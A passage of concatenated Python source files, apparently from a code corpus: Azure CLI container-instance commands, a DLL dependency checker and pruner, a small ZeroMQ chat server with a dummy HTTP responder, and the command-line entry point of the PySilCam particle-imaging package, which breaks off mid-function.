storage_account_key=azure_file_volume_account_key)
return Volume(name=AZURE_FILE_VOLUME_NAME, azure_file=azure_file_volume) if azure_file_volume else None
def _create_secrets_volume(secrets):
"""Create secrets volume. """
return Volume(name=SECRETS_VOLUME_NAME, secret=secrets) if secrets else None
def _create_gitrepo_volume(gitrepo_url, gitrepo_dir, gitrepo_revision):
"""Create Git Repo volume. """
gitrepo_volume = GitRepoVolume(repository=gitrepo_url, directory=gitrepo_dir, revision=gitrepo_revision)
return Volume(name=GITREPO_VOLUME_NAME, git_repo=gitrepo_volume) if gitrepo_url else None
# pylint: disable=inconsistent-return-statements
def _create_azure_file_volume_mount(azure_file_volume, azure_file_volume_mount_path):
"""Create Azure File volume mount. """
if azure_file_volume_mount_path:
if not azure_file_volume:
raise CLIError('Please specify --azure-file-volume-share-name --azure-file-volume-account-name --azure-file-volume-account-key '
'to enable Azure File volume mount.')
return VolumeMount(name=AZURE_FILE_VOLUME_NAME, mount_path=azure_file_volume_mount_path)
def _create_secrets_volume_mount(secrets_volume, secrets_mount_path):
"""Create secrets volume mount. """
if secrets_volume:
if not secrets_mount_path:
raise CLIError('Please specify --secrets --secrets-mount-path '
'to enable secrets volume mount.')
return VolumeMount(name=SECRETS_VOLUME_NAME, mount_path=secrets_mount_path)
def _create_gitrepo_volume_mount(gitrepo_volume, gitrepo_mount_path):
"""Create Git Repo volume mount. """
if gitrepo_mount_path:
if not gitrepo_volume:
raise CLIError('Please specify --gitrepo-url (--gitrepo-dir --gitrepo-revision) '
'to enable Git Repo volume mount.')
return VolumeMount(name=GITREPO_VOLUME_NAME, mount_path=gitrepo_mount_path)
# pylint: disable=inconsistent-return-statements
def _create_ip_address(ip_address, ports, protocol, dns_name_label, network_profile):
"""Create IP address. """
if (ip_address and ip_address.lower() == 'public') or dns_name_label:
return IpAddress(ports=[Port(protocol=protocol, port=p) for p in ports],
dns_name_label=dns_name_label, type=ContainerGroupIpAddressType.public)
elif network_profile:
return IpAddress(ports=[Port(protocol=protocol, port=p) for p in ports],
type=ContainerGroupIpAddressType.private)
# pylint: disable=inconsistent-return-statements
def container_logs(cmd, resource_group_name, name, container_name=None, follow=False):
"""Tail a container instance log. """
container_client = cf_container(cmd.cli_ctx)
container_group_client = cf_container_groups(cmd.cli_ctx)
container_group = container_group_client.get(resource_group_name, name)
# If container name is not present, use the first container.
if container_name is None:
container_name = container_group.containers[0].name
if not follow:
log = container_client.list_logs(resource_group_name, name, container_name)
print(log.content)
else:
_start_streaming(
terminate_condition=_is_container_terminated,
terminate_condition_args=(container_group_client, resource_group_name, name, container_name),
shupdown_grace_period=5,
stream_target=_stream_logs,
stream_args=(container_client, resource_group_name, name, container_name, container_group.restart_policy))
def container_export(cmd, resource_group_name, name, file):
resource_client = cf_resource(cmd.cli_ctx)
container_group_client = cf_container_groups(cmd.cli_ctx)
resource = resource_client.resources.get(resource_group_name,
"Microsoft.ContainerInstance",
'',
"containerGroups",
name,
container_group_client.api_version,
False).__dict__
# Remove unwanted properites
resource['properties'].pop('instanceView', None)
resource.pop('sku', None)
resource.pop('id', None)
resource.pop('plan', None)
resource.pop('kind', None)
resource.pop('managed_by', None)
resource['properties'].pop('provisioningState', None)
# Correctly export the identity
try:
identity = resource['identity'].type
if identity != ResourceIdentityType.none:
resource['identity'] = resource['identity'].__dict__
identity_entry = {'type': resource['identity']['type'].value}
if resource['identity']['user_assigned_identities']:
identity_entry['user_assigned_identities'] = {k: {} for k in resource['identity']['user_assigned_identities']}
resource['identity'] = identity_entry
except (KeyError, AttributeError):
resource.pop('indentity', None)
# Remove container instance views
for i in range(len(resource['properties']['containers'])):
resource['properties']['containers'][i]['properties'].pop('instanceView', None)
# Add the api version
resource['apiVersion'] = container_group_client.api_version
with open(file, 'w+') as f:
yaml.safe_dump(resource, f, default_flow_style=False)
def container_exec(cmd, resource_group_name, name, exec_command, container_name=None, terminal_row_size=20, terminal_col_size=80):
"""Start exec for a container. """
container_client = cf_container(cmd.cli_ctx)
container_group_client = cf_container_groups(cmd.cli_ctx)
container_group = container_group_client.get(resource_group_name, name)
if container_name or container_name is None and len(container_group.containers) == 1:
# If only one container in container group, use that container.
if container_name is None:
container_name = container_group.containers[0].name
terminal_size = ContainerExecRequestTerminalSize(rows=terminal_row_size, cols=terminal_col_size)
execContainerResponse = container_client.execute_command(resource_group_name, name, container_name, exec_command, terminal_size)
if platform.system() is WINDOWS_NAME:
_start_exec_pipe_win(execContainerResponse.web_socket_uri, execContainerResponse.password)
else:
_start_exec_pipe(execContainerResponse.web_socket_uri, execContainerResponse.password)
else:
raise CLIError('--container-name required when container group has more than one container.')
def _start_exec_pipe_win(web_socket_uri, password):
def _on_ws_open(ws):
ws.send(password)
t = threading.Thread(target=_capture_stdin, args=[ws])
t.daemon = True
t.start()
ws = websocket.WebSocketApp(web_socket_uri, on_open=_on_ws_open, on_message=_on_ws_msg)
ws.run_forever()
def _on_ws_msg(ws, msg):
sys.stdout.write(msg)
sys.stdout.flush()
def _capture_stdin(ws):
while True:
if msvcrt.kbhit:
x = msvcrt.getch()
ws.send(x)
def _start_exec_pipe(web_socket_uri, password):
ws = websocket.create_connection(web_socket_uri)
oldtty = termios.tcgetattr(sys.stdin)
old_handler = signal.getsignal(signal.SIGWINCH)
try:
tty.setraw(sys.stdin.fileno())
tty.setcbreak(sys.stdin.fileno())
ws.send(password)
while True:
try:
if not _cycle_exec_pipe(ws):
break
except (select.error, IOError) as e:
if e.args and e.args[0] == errno.EINTR:
pass
else:
raise
except websocket.WebSocketException:
pass
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
signal.signal(signal.SIGWINCH, old_handler)
def _cycle_exec_pipe(ws):
r, _, _ = select.select([ws.sock, sys.stdin], [], [])
if ws.sock in r:
data = ws.recv()
if not data:
return False
sys.stdout.write(data)
sys.stdout.flush()
if sys.stdin in r:
x = sys.stdin.read(1)
if not x:
return True
ws.send(x)
return True
def attach_to_container(cmd, resource_group_name, name, container_name=None):
"""Attach to a container. """
container_client = cf_container(cmd.cli_ctx)
container_group_client = cf_container_groups(cmd.cli_ctx)
container_group = container_group_client.get(resource_group_name, name)
# If container name is not present, use the first container.
if container_name is None:
container_name = container_group.containers[0].name
_start_streaming(
terminate_condition=_is_container_terminated,
terminate_condition_args=(container_group_client, resource_group_name, name, container_name),
shupdown_grace_period=5,
stream_target=_stream_container_events_and_logs,
stream_args=(container_group_client, container_client, resource_group_name, name, container_name))
def _start_streaming(terminate_condition, terminate_condition_args, shupdown_grace_period, stream_target, stream_args):
"""Start streaming for the stream target. """
import colorama
colorama.init()
try:
t = threading.Thread(target=stream_target, args=stream_args)
t.daemon = True
t.start()
while not terminate_condition(*terminate_condition_args) and t.is_alive():
time.sleep(10)
time.sleep(shupdown_grace_period)
finally:
colorama.deinit()
def _stream_logs(client, resource_group_name, name, container_name, restart_policy):
"""Stream logs for a container. """
lastOutputLines = 0
while True:
log = client.list_logs(resource_group_name, name, container_name)
lines = log.content.split('\n')
currentOutputLines = len(lines)
# Should only happen when the container restarts.
if currentOutputLines < lastOutputLines and restart_policy != 'Never':
print("Warning: you're having '--restart-policy={}'; the container '{}' was just restarted; the tail of the current log might be missing. Exiting...".format(restart_policy, container_name))
break
_move_console_cursor_up(lastOutputLines)
print(log.content)
lastOutputLines = currentOutputLines
time.sleep(2)
def _stream_container_events_and_logs(container_group_client, container_client, resource_group_name, name, container_name):
"""Stream container events and logs. """
lastOutputLines = 0
lastContainerState = None
while True:
container_group, container = _find_container(container_group_client, resource_group_name, name, container_name)
container_state = 'Unknown'
if container.instance_view and container.instance_view.current_state and container.instance_view.current_state.state:
container_state = container.instance_view.current_state.state
_move_console_cursor_up(lastOutputLines)
if container_state != lastContainerState:
print("Container '{}' is in state '{}'...".format(container_name, container_state))
currentOutputLines = 0
if container.instance_view and container.instance_view.events:
for event in sorted(container.instance_view.events, key=lambda e: e.last_timestamp):
print('(count: {}) (last timestamp: {}) {}'.format(event.count, event.last_timestamp, event.message))
currentOutputLines += 1
lastOutputLines = currentOutputLines
lastContainerState = container_state
if container_state == 'Running':
print('\nStart streaming logs:')
break
time.sleep(2)
_stream_logs(container_client, resource_group_name, name, container_name, container_group.restart_policy)
def _is_container_terminated(client, resource_group_name, name, container_name):
"""Check if a container should be considered terminated. """
container_group, container = _find_container(client, resource_group_name, name, container_name)
# If a container group is terminated, assume the container is also terminated.
if container_group.instance_view and container_group.instance_view.state:
if container_group.instance_view.state == 'Succeeded' or container_group.instance_view.state == 'Failed':
return True
# If the restart policy is Always, assume the container will be restarted.
if container_group.restart_policy:
if container_group.restart_policy == 'Always':
return False
# Only assume the container is terminated if its state is Terminated.
if container.instance_view and container.instance_view.current_state and container.instance_view.current_state.state == 'Terminated':
return True
return False
def _find_container(client, resource_group_name, name, container_name):
"""Find a container in a container group. """
container_group = client.get(resource_group_name, name)
containers = [c for c in container_group.containers if c.name == container_name]
if len(containers) != 1:
raise CLIError("Found 0 or more than 1 container with name '{}'".format(container_name))
return container_group, containers[0]
def _move_console_cursor_up(lines):
"""Move console cursor up. """
if lines > 0:
# Use stdout.write to support Python 2
sys.stdout.write('\033[{}A\033[K\033[J'.format(lines))
def _gen_guid():
import uuid
return uuid.uuid4()
|
depcheck.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2016,2017 Christoph Reiter
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
"""
Deletes unneeded DLLs and checks DLL dependencies.
Execute with the build python, will figure out the rest.
"""
import subprocess
import os
import sys
from multiprocessing import Process, Queue
import gi
gi.require_version("GIRepository", "2.0")
from gi.repository import GIRepository
def _get_shared_libraries(q, namespace, version):
repo = GIRepository.Repository()
repo.require(namespace, version, 0)
lib = repo.get_shared_library(namespace)
q.put(lib)
def get_shared_libraries(namespace, version):
# we have to start a new process because multiple versions can't be loaded
# in the same process
q = Queue()
p = Process(target=_get_shared_libraries, args=(q, namespace, version))
p.start()
result = q.get()
p.join()
return result
def get_required_by_typelibs():
deps = set()
repo = GIRepository.Repository()
for tl in os.listdir(repo.get_search_path()[0]):
namespace, version = os.path.splitext(tl)[0].split("-", 1)
lib = get_shared_libraries(namespace, version)
if lib:
libs = lib.lower().split(",")
else:
libs = []
for lib in libs:
deps.add((namespace, version, lib))
return deps
def get_dependencies(filename):
deps = []
try:
data = subprocess.check_output(["objdump", "-p", filename],
stderr=subprocess.STDOUT)
except subprocess.CalledProcessError:
# can happen with wrong arch binaries
return []
data = data.decode("utf-8")
for line in data.splitlines():
line = line.strip()
if line.startswith("DLL Name:"):
deps.append(line.split(":", 1)[-1].strip().lower())
return deps
def find_lib(root, name):
system_search_path = os.path.join("C:", os.sep, "Windows", "System32")
if get_lib_path(root, name):
return True
elif os.path.exists(os.path.join(system_search_path, name)):
return True
elif name in ["gdiplus.dll"]:
return True
elif name.startswith("msvcr"):
return True
return False
def get_lib_path(root, name):
search_path = os.path.join(root, "bin")
if os.path.exists(os.path.join(search_path, name)):
return os.path.join(search_path, name)
def get_things_to_delete(root):
extensions = [".exe", ".pyd", ".dll"]
all_libs = set()
needed = set()
for base, dirs, files in os.walk(root):
for f in files:
lib = f.lower()
path = os.path.join(base, f)
ext_lower = os.path.splitext(f)[-1].lower()
if ext_lower in extensions:
if ext_lower == ".exe":
# we use .exe as dependency root
needed.add(lib)
all_libs.add(f.lower())
for lib in get_dependencies(path):
all_libs.add(lib)
needed.add(lib)
if not find_lib(root, lib):
print("MISSING:", path, lib)
for namespace, version, lib in get_required_by_typelibs():
all_libs.add(lib)
needed.add(lib)
if not find_lib(root, lib):
print("MISSING:", namespace, version, lib)
to_delete = []
for not_depended_on in (all_libs - needed):
path = get_lib_path(root, not_depended_on)
if path:
to_delete.append(path)
return to_delete
def main(argv):
libs = get_things_to_delete(sys.prefix)
if "--delete" in argv[1:]:
while libs:
for l in libs:
print("DELETE:", l)
os.unlink(l)
libs = get_things_to_delete(sys.prefix)
if __name__ == "__main__":
main(sys.argv)
|
server.py
|
#!/usr/bin/env python3
import argparse
import http.server
import time
import threading
import zmq
# constants
HTTP_PORT=8090
RADIO_PORT=12345
PUB_PORT=5555
REP_PORT=5556
#######################################################################################################################
# TODO create server class that contains users, sessions, ...
# TODO capture exit signals
#######################################################################################################################
req_help_str = \
"""
[? | help] --> <this help string>
ctrl/info --> ctrl/users=<users>,...
ctrl/ping --> ctrl/ping
chat/login/<user>:<passwd> --> chat/[ok|nok]
chat/logout/<user> --> chat/[ok|nok]
chat/post/<topic>:<msg> --> chat/[ok|nok]
chat/send/<user>:<msg> --> chat/[ok|nok]"""
class replier:
def __init__(self, zctx, port):
self.zctx = zctx
self.port = port
self.open_socket()
def open_socket(self):
self.socket = self.zctx.socket(zmq.REP)
self.socket.bind('tcp://0.0.0.0:{}'.format(self.port))
def send_reply(self, rep_str):
raw = rep_str.encode('utf-8')
self.socket.send(raw)
def wait_for_request(self):
raw = self.socket.recv()
return raw.decode('utf-8')
def mode_chat_parse(self, req_list):
req = req_list[1]
if len(req) <= 1:
rep = 'chat/nok'
print('error: REQ [mode = chat, req = {}]'.format(req))
return rep
print('mode = chat, req = {}'.format(req))
if req == 'login':
rep = 'chat/ok'
else:
rep = 'chat/nok'
return rep
def mode_ctrl_parse(self, req_list):
req = req_list[1]
if len(req) <= 1:
rep = 'ctrl/nok'
print('error: REQ format [mode = ctrl, req = {}]'.format(req))
return rep
print('mode = ctrl, req = {}'.format(req))
if req == 'info':
rep = 'ctrl/ok'
elif req == 'ping':
rep = 'ctrl/pong'
else:
rep = 'ctrl/nok'
return rep
def parse_request(self, req_str):
print('recv: {}'.format(req_str))
if req_str in ('?', 'help'):
rep_str = req_help_str
return rep_str
req_list = req_str.split(sep='/')
if len(req_list) < 2:
print('error: REQ format [{}]'.format(req_str))
return 'nok'
mode = req_list[0]
if len(mode) <= 1:
print('error: REQ format [{}]'.format(req_str))
return 'nok'
print('mode = {}'.format(mode))
if mode == 'ctrl':
rep_str = self.mode_ctrl_parse(req_list)
return rep_str
return 'nok'
def thread_req(self):
while True:
req_str = self.wait_for_request()
rep_str = self.parse_request(req_str)
self.send_reply(rep_str)
def start(self):
self.tid = threading.Thread(target=self.thread_req, daemon=True)
self.tid.start()
#######################################################################################################################
class publisher:
def __init__(self, zctx, port):
self.zctx = zctx
self.port = port
self.open_socket()
def open_socket(self):
self.socket = self.zctx.socket(zmq.PUB)
self.socket.bind('tcp://0.0.0.0:{}'.format(self.port))
def send(self, topic, msg):
data = "chat/{}/{}".format(topic, msg)
self.socket.send(data.encode('utf-8'))
#######################################################################################################################
http_content = \
"""<html>
<head><title>501 Not Implemented</title></head>
<body bgcolor="white">
<center><h1>501 Not Implemented</h1></center>
<hr><center>nginx</center>
</body>
</html>
"""
class SimpleReply(http.server.BaseHTTPRequestHandler):
def _set_headers(self):
self.send_response(501)
self.send_header("Content-type", "text/html")
self.end_headers()
def _html(self):
return http_content.encode("utf8")
def do_GET(self):
self._set_headers()
self.wfile.write(self._html())
def do_HEAD(self):
self._set_headers()
def do_POST(self):
# Doesn't do anything with posted data
self._set_headers()
self.wfile.write(self._html("POST!"))
def log_message(self, format, *args):
return
class dummy_http:
def __init__(self, port):
self.port = port
def thread_http(self):
server_address = ("0.0.0.0", self.port)
print('starting httpd server on {}'.format(server_address))
httpd = http.server.HTTPServer(server_address, SimpleReply)
httpd.serve_forever()
def start(self):
self.tid = threading.Thread(target=self.thread_http, daemon=True)
self.tid.start()
#######################################################################################################################
#https://medium.com/greedygame-engineering/an-elegant-way-to-run-periodic-tasks-in-python-61b7c477b679
class timed_job:
def __init__(self, timeout, pub):
self.timeout = timeout
self.pub = pub
self.start()
def timer_callback(self):
self.pub.send('foo', 'bar')
def thread_wait(self):
while not self.event.wait(self.timeout):
self.timer_callback()
def start(self):
self.event = threading.Event()
self.tid = threading.Thread(target=self.thread_wait, daemon=True)
self.tid.start()
#######################################################################################################################
def parse_args():
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument('-h', '--http', dest='http_port', type=int, nargs='?', const=HTTP_PORT,
help='enable http socket on port (default: {})'.format(HTTP_PORT))
parser.add_argument('-p', '--pub', dest='pub_port', type=int, nargs='?', const=PUB_PORT, default=PUB_PORT,
help='enable publish socket on port (default: {})'.format(PUB_PORT))
parser.add_argument('-r', '--rep', dest='rep_port', type=int, nargs='?', const=REP_PORT, default=REP_PORT,
help='enable publish socket on port (default: {})'.format(REP_PORT))
parser.add_argument("-v", "--verbose", dest='verbose', action='store_true', help="verbose mode")
parser.add_argument('--help', action='help', help='show this help message and exit')
args = parser.parse_args()
return args
def main():
args = parse_args()
print('args: {}'.format(args))
if args.http_port != None:
web_dummy = dummy_http(args.http_port)
web_dummy.start()
zctx = zmq.Context()
if args.pub_port != None:
pub = publisher(zctx, args.pub_port)
test = timed_job(5, pub)
if args.rep_port != None:
rep = replier(zctx, args.rep_port)
rep.start()
time.sleep(99999)
if __name__ == "__main__":
main()
|
__main__.py
|
# -*- coding: utf-8 -*-
import sys
import time
import datetime
import logging
from docopt import docopt
import numpy as np
from pysilcam import __version__
from pysilcam.acquisition import Acquire
from pysilcam.background import backgrounder
from pysilcam.process import statextract
import pysilcam.oilgas as scog
from pysilcam.config import PySilcamSettings
import os
import pysilcam.silcam_classify as sccl
import multiprocessing
from multiprocessing.managers import BaseManager
from queue import LifoQueue
import psutil
from shutil import copyfile
import warnings
if not sys.warnoptions:
warnings.simplefilter("ignore")
title = '''
____ ____ _ _ ____
| _ \ _ _/ ___|(_) |/ ___|__ _ _ __ ___
| |_) | | | \___ \| | | | / _` | '_ ` _ \
| __/| |_| |___) | | | |__| (_| | | | | | |
|_| \__, |____/|_|_|\____\__,_|_| |_| |_|
|___/
'''
def silcam():
'''Aquire/process images from the SilCam
Usage:
silcam acquire <configfile> <datapath>
silcam process <configfile> <datapath> [--nbimages=<number of images>] [--nomultiproc]
silcam realtime <configfile> <datapath> [--discwrite] [--nomultiproc]
silcam -h | --help
silcam --version
Arguments:
acquire Acquire images
process Process images
realtime Acquire images from the camera and process them in real time
Options:
--nbimages=<number of images> Number of images to process.
--discwrite Write images to disc.
--nomultiproc Deactivate multiprocessing.
-h --help Show this screen.
--version Show version.
'''
print(title)
print('')
args = docopt(silcam.__doc__, version='PySilCam {0}'.format(__version__))
if args['<datapath>']:
# The following is solving problems in transfering arguments from shell on windows
# Remove ' characters
datapath = os.path.normpath(args['<datapath>'].replace("'",""))
# Remove " characters at the end (occurs when user give \" at the end)
while datapath[-1] == '"':
datapath = datapath[:-1]
# this is the standard processing method under development now
if args['process']:
multiProcess = True
if args['--nomultiproc']:
multiProcess = False
nbImages = args['--nbimages']
if (nbImages != None):
try:
nbImages = int(nbImages)
except ValueError:
print('Expected type int for --nbimages.')
sys.exit(0)
silcam_process(args['<configfile>'] ,datapath, multiProcess=multiProcess, realtime=False, nbImages=nbImages)
elif args['acquire']: # this is the standard acquisition method under development now
silcam_acquire(datapath, args['<configfile>'], writeToDisk=True)
elif args['realtime']:
discWrite = False
if args['--discwrite']:
discWrite = True
multiProcess = True
if args['--nomultiproc']:
multiProcess = False
silcam_process(args['<configfile>'], datapath, multiProcess=multiProcess, realtime=True, discWrite=discWrite)
def silcam_acquire(datapath, config_filename, writeToDisk=True, gui=None):
'''Aquire images from the SilCam
Args:
datapath (str) : Path to the image storage
config_filename=None (str) : Camera config file
writeToDisk=True (Bool) : True will enable writing of raw data to disc
False will disable writing of raw data to disc
gui=None (Class object) : Queue used to pass information between process thread and GUI
initialised in ProcThread within guicals.py
'''
#Load the configuration, create settings object
settings = PySilcamSettings(config_filename)
#Print configuration to screen
print('---- CONFIGURATION ----\n')
settings.config.write(sys.stdout)
print('-----------------------\n')
if (writeToDisk):
# Copy config file
configFile2Copy = datetime.datetime.now().strftime('D%Y%m%dT%H%M%S.%f') + os.path.basename(config_filename)
copyfile(config_filename, os.path.join(datapath, configFile2Copy))
configure_logger(settings.General)
logger = logging.getLogger(__name__ + '.silcam_acquire')
# update path_length
updatePathLength(settings, logger)
acq = Acquire(USE_PYMBA=True) # ini class
t1 = time.time()
aqgen = acq.get_generator(datapath, camera_config_file=config_filename, writeToDisk=writeToDisk)
for i, (timestamp, imraw) in enumerate(aqgen):
t2 = time.time()
aq_freq = np.round(1.0/(t2 - t1), 1)
requested_freq = 16.0
rest_time = (1 / requested_freq) - (1 / aq_freq)
rest_time = np.max([rest_time, 0.])
time.sleep(rest_time)
actual_aq_freq = 1/(1/aq_freq + rest_time)
print('Image {0} acquired at frequency {1:.1f} Hz'.format(i, actual_aq_freq))
t1 = time.time()
if not gui==None:
while (gui.qsize() > 0):
try:
gui.get_nowait()
time.sleep(0.001)
except:
continue
#try:
rtdict = dict()
rtdict = {'dias': 0,
'vd_oil': 0,
'vd_gas': 0,
'oil_d50': 0,
'gas_d50': 0,
'saturation': 0}
gui.put_nowait((timestamp, imraw, imraw, rtdict))
# the standard processing method under active development
def silcam_process(config_filename, datapath, multiProcess=True, realtime=False, discWrite=False, nbImages=None, gui=None,
overwriteSTATS = True):
'''Run processing of SilCam images
Args:
config_filename (str) : The filename (including path) of the config.ini file
datapath (str) : Path to the data directory
multiProcess=True (bool) : If True, multiprocessing is used
realtime=False (bool) : If True, a faster but less accurate methods is used for segmentation and rts stats become active
discWrite=False (bool) : True will enable writing of raw data to disc
False will disable writing of raw data to disc
nbImages=None (int) : Number of images to skip
gui=None (Class object) : Queue used to pass information between process thread and GUI
initialised in ProcThread within guicals.py
'''
print(config_filename)
print('')
#---- SETUP ----
#Load the configuration, create settings object
settings = PySilcamSettings(config_filename)
#Print configuration to screen
print('---- CONFIGURATION ----\n')
settings.config.write(sys.stdout)
print('-----------------------\n')
#Configure logging
configure_logger(settings.General)
logger = logging.getLogger(__name__ + '.silcam_process')
logger.info('Processing path: ' + datapath)
if realtime:
if discWrite:
# copy config file into data path
configFile2Copy = datetime.datetime.now().strftime('D%Y%m%dT%H%M%S.%f') + os.path.basename(config_filename)
copyfile(config_filename, os.path.join(datapath, configFile2Copy))
# update path_length
updatePathLength(settings, logger)
#Initialize the image acquisition generator
aq = Acquire(USE_PYMBA=realtime)
aqgen = aq.get_generator(datapath, writeToDisk=discWrite,
camera_config_file=config_filename)
#Get number of images to use for background correction from config
print('* Initializing background image handler')
bggen = backgrounder(settings.Background.num_images, aqgen,
bad_lighting_limit = settings.Process.bad_lighting_limit,
real_time_stats=settings.Process.real_time_stats)
# make datafilename autogenerated for easier batch processing
if (not os.path.isdir(settings.General.datafile)):
logger.info('Folder ' + settings.General.datafile + ' was not found and is created')
os.mkdir(settings.General.datafile)
procfoldername = os.path.split(datapath)[-1]
datafilename = os.path.join(settings.General.datafile,procfoldername)
logger.info('output stats to: ' + datafilename)
if os.path.isfile(datafilename + '-STATS.csv') and overwriteSTATS:
logger.info('removing: ' + datafilename + '-STATS.csv')
print('Overwriting ' + datafilename + '-STATS.csv')
os.remove(datafilename + '-STATS.csv')
# Create export directory if needed
if settings.ExportParticles.export_images:
if (not os.path.isdir(settings.ExportParticles.outputpath)):
logger.info('Export folder ' + settings.ExportParticles.outputpath + ' was not found and is created')
os.mkdir(settings.ExportParticles.outputpath)
#---- END SETUP ----
#---- RUN PROCESSING ----
# If only one core is available, no multiprocessing will be done
multiProcess = multiProcess and (multiprocessing.cpu_count() > 1)
print('* Commencing image acquisition and processing')
# initialise realtime stats class regardless of whether it is used later
rts = scog.rt_stats(settings)
if (multiProcess):
proc_list = []
mem = psutil.virtual_memory()
memAvailableMb = mem.available >> 20
distributor_q_size = np.min([int(memAvailableMb / 2 * 1/15), np.copy(multiprocessing.cpu_count() * 4)])
logger.debug('setting up processing queues')
inputQueue, outputQueue = defineQueues(realtime, distributor_q_size)
logger.debug('setting up processing distributor')
distributor(inputQueue, outputQueue, config_filename, proc_list, gui)
# iterate on the bggen generator to obtain images
logger.debug('Starting acquisition loop')
t2 = time.time()
for i, (timestamp, imc, imraw) in enumerate(bggen):
t1 = np.copy(t2)
t2 = time.time()
print(t2-t1, 'Acquisition loop time')
logger.debug('Corrected image ' + str(timestamp) +
' acquired from backgrounder')
# handle errors if the loop function fails for any reason
if (nbImages != None):
if (nbImages <= i):
break
logger.debug('Adding image to processing queue: ' + str(timestamp))
addToQueue(realtime, inputQueue, i, timestamp, imc) # the tuple (i, timestamp, imc) is added to the inputQueue
logger.debug('Processing queue updated')
# write the images that are available for the moment into the csv file
logger.debug('Running collector')
collector(inputQueue, outputQueue, datafilename, proc_list, False,
settings, rts=rts)
logger.debug('Data collected')
if not gui==None:
logger.debug('Putting data on GUI Queue')
while (gui.qsize() > 0):
try:
gui.get_nowait()
time.sleep(0.001)
except:
continue
#try:
rtdict = dict()
rtdict = {'dias': rts.dias,
'vd_oil': rts.vd_oil,
'vd_gas': rts.vd_gas,
'oil_d50': rts.oil_d50,
'gas_d50': rts.gas_d50,
'saturation': rts.saturation}
gui.put_nowait((timestamp, imc, imraw, rtdict))
logger.debug('GUI queue updated')
logger.debug('Acquisition loop completed')
if (not realtime):
logger.debug('Halting processes')
for p in proc_list:
inputQueue.put(None)
# some images might still be waiting to be written to the csv file
logger.debug('Running collector on left over data')
collector(inputQueue, outputQueue, datafilename, proc_list, True,
settings, rts=rts)
logger.debug('All data collected')
for p in proc_list:
p.join()
logger.info('%s.exitcode = %s' % (p.name, p.exitcode) )
else:
# load the model for particle classification and keep it for later
nnmodel = []
nnmodel, class_labels = sccl.load_model(model_path=settings.NNClassify.model_path)
# iterate on the bggen generator to obtain images
for i, (timestamp, imc, imraw) in enumerate(bggen):
# handle errors if the loop function fails for any reason
if (nbImages != None):
if (nbImages <= i):
break
image = (i, timestamp, imc)
# one single image is processed at a time
stats_all = processImage(nnmodel, class_labels, image, settings, logger, gui)
if (not stats_all is None): # if frame processed
# write the image into the csv file
writeCSV( datafilename, stats_all)
print('PROCESSING COMPLETE.')
#---- END ----
def addToQueue(realtime, inputQueue, i, timestamp, imc):
'''
Put a new image into the Queue.
Args:
realtime (bool) : boolean indicating wether the processing is done in realtime
inputQueue () : queue where the images are added for processing
initilised using defineQueues()
i (int) : index of the image acquired
timestamp (timestamp): timestamp of the acquired image
imc (uint8) : corrected image
'''
if (realtime):
try:
inputQueue.put_nowait((i, timestamp, imc))
except:
pass
else:
while True:
try:
inputQueue.put((i, timestamp, imc), True, 0.5)
break
except:
pass
def defineQueues(realtime, size):
'''
Define the input and output queues depending on wether we are in realtime mode
Args:
realtime: boolean indicating whether the processing is done in realtime
size: max size of the queue
Returns:
inputQueue
outputQueue
'''
createQueues = createLIFOQueues if realtime else createFIFOQueues
return createQueues(size)
def createLIFOQueues(size):
'''
Create a LIFOQueue (Last In First Out)
Args:
size: max size of the queue
Returns:
inputQueue
outputQueue
'''
manager = MyManager()
manager.start()
inputQueue = manager.LifoQueue(size)
outputQueue = manager.LifoQueue(size)
return inputQueue, outputQueue
def createFIFOQueues(size):
'''
Create a FIFOQueue (First In First Out)
Args:
size: max size of the queue
Returns:
inputQueue
outputQueue
'''
inputQueue = multiprocessing.Queue(size)
outputQueue = multiprocessing.Queue(size)
return inputQueue, outputQueue
class MyManager(BaseManager):
'''
Customized manager class used to register LifoQueues
'''
pass
MyManager.register('LifoQueue', LifoQueue)
def processImage(nnmodel, class_labels, image, settings, logger, gui):
'''
Proceses an image
Args:
nnmodel (tensorflow model object) : loaded using sccl.load_model()
class_labels (str) : loaded using sccl.load_model()
image (tuple) : tuple contianing (i, timestamp, imc)
where i is an int referring to the image number
timestamp is the image timestamp obtained from passing the filename
imc is the background-corrected image obtained using the backgrounder generator
settings (PySilcamSettings) : Settings read from a .ini file
logger (logger object) : logger object created using
configure_logger()
gui=None (Class object) : Queue used to pass information between process thread and GUI
initialised in ProcThread within guicals.py
Returns:
stats_all (DataFrame) : stats dataframe containing particle statistics
'''
try:
i = image[0]
timestamp = image[1]
imc = image[2]
#time the full acquisition and processing loop
start_time = time.clock()
logger.info('Processing time stamp {0}'.format(timestamp))
#Calculate particle statistics
stats_all, imbw, saturation = statextract(imc, settings, timestamp,
nnmodel, class_labels)
# if there are not particles identified, assume zero concentration.
# This means that the data should indicate that a 'good' image was
# obtained, without any particles. Therefore fill all values with nans
# and add the image timestamp
if len(stats_all) == 0:
print('ZERO particles identified')
z = np.zeros(len(stats_all.columns)) * np.nan
stats_all.loc[0] = z
# 'export name' should not be nan because then this column of the
# DataFrame will contain multiple types, so label with string instead
if settings.ExportParticles.export_images:
stats_all['export name'] = 'not_exported'
# add timestamp to each row of particle statistics
stats_all['timestamp'] = timestamp
# add saturation to each row of particle statistics
stats_all['saturation'] = saturation
#Time the particle statistics processing step
proc_time = time.clock() - start_time
#Print timing information for this iteration
infostr = ' Image {0} processed in {1:.2f} sec ({2:.1f} Hz). '
infostr = infostr.format(i, proc_time, 1.0/proc_time)
print(infostr)
#---- END MAIN PROCESSING LOOP ----
#---- DO SOME ADMIN ----
except:
infostr = 'Failed to process frame {0}, skipping.'.format(i)
logger.warning(infostr, exc_info=True)
print(infostr)
return None
return stats_all
def loop(config_filename, inputQueue, outputQueue, gui=None):
'''
Main processing loop, run for each image
Args:
config_filename (str) : path of the config ini file
inputQueue () : queue where the images are added for processing
initilised using defineQueues()
outputQueue () : queue where information is retrieved from processing
initilised using defineQueues()
gui=None (Class object) : Queue used to pass information between process thread and GUI
initialised in ProcThread within guicals.py
'''
settings = PySilcamSettings(config_filename)
configure_logger(settings.General)
logger = logging.getLogger(__name__ + '.silcam_process')
# load the model for particle classification and keep it for later
nnmodel = []
nnmodel, class_labels = sccl.load_model(model_path=settings.NNClassify.model_path)
while True:
task = inputQueue.get()
if task is None:
